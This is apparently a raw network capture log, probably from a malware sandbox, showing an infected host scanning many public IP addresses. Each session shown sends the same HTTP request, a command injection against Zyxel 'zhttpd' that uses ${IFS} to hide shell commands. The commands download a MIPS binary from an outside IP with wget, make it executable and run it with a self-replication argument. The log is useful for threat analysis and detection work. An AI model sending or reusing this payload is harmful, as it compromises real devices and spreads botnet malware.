                                                Jan 28, 2024 10:16:24.798316002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4217192.168.2.233393870.243.71.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798347950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4218192.168.2.2348508125.107.24.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798350096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4219192.168.2.233791066.29.50.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798404932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4220192.168.2.234169885.188.15.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798439026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4221192.168.2.2360826168.59.89.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798482895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4222192.168.2.2345364192.100.69.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798502922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4223192.168.2.236047893.40.152.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798540115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4224192.168.2.2341624136.183.173.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798542976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4225192.168.2.234358673.253.253.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798563004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4226192.168.2.234319632.108.217.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798610926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4227192.168.2.234901243.27.155.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798631907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4228192.168.2.234940071.239.234.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798654079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4229192.168.2.233904627.103.228.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798701048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4230192.168.2.2350312144.164.56.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798734903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4231192.168.2.2354672183.207.91.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798753023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4232192.168.2.233504414.243.169.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798779964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4233192.168.2.2358160161.198.130.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798806906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4234192.168.2.2356666201.2.22.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798834085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4235192.168.2.235097872.12.23.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798867941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4236192.168.2.2332824206.211.46.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798902988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4237192.168.2.233490686.188.108.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798939943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4238192.168.2.2342970217.208.198.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798966885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4239192.168.2.2339362222.1.196.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798990965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4240192.168.2.235103034.21.86.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799015045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4241192.168.2.2333646216.14.62.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799038887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4242192.168.2.2344816144.92.43.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799065113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4243192.168.2.234399071.119.251.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799082994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4244192.168.2.235828641.202.94.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799114943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4245192.168.2.2334862190.139.215.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799139977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4246192.168.2.235644079.94.173.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799180984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4247192.168.2.23530061.31.28.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799204111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4248192.168.2.235352848.35.244.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799232960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4249192.168.2.2360326168.40.116.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799252033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4250192.168.2.2334906142.18.223.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799285889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4251192.168.2.234656088.206.192.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799310923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4252192.168.2.2352402169.138.126.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799331903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4253192.168.2.2343194201.247.237.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799364090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4254192.168.2.234424865.100.209.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799391985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4255192.168.2.233978479.154.227.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799407959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4256192.168.2.234197858.163.43.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799436092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4257192.168.2.2359776184.230.91.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799467087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4258192.168.2.235388668.70.180.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799484015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4259192.168.2.235823860.222.95.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799524069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4260192.168.2.233743892.37.88.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799546957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4261192.168.2.235483071.99.197.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799576998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4262192.168.2.2355580210.98.103.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799580097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4263192.168.2.2360622204.93.65.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799608946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4264192.168.2.2352926100.239.30.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799664021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4265192.168.2.2341582190.207.177.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799680948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4266192.168.2.2333970190.192.66.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799710989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4267192.168.2.2339600148.157.18.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799746990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4268192.168.2.23577421.6.71.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799787998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4269192.168.2.234934884.156.127.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799833059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4270192.168.2.2341338105.95.138.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799848080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4271192.168.2.2357888166.158.207.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799885988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4272192.168.2.233866437.37.176.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799932957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4273192.168.2.2351846213.117.233.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799951077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4274192.168.2.2356032217.180.19.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799979925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4275192.168.2.2350554201.87.202.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.799993992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4276192.168.2.2353794157.5.129.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800007105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4277192.168.2.2338286180.30.136.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.800035000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4278192.168.2.2349076149.63.251.68443
                                                TimestampBytes transferredDirectionData
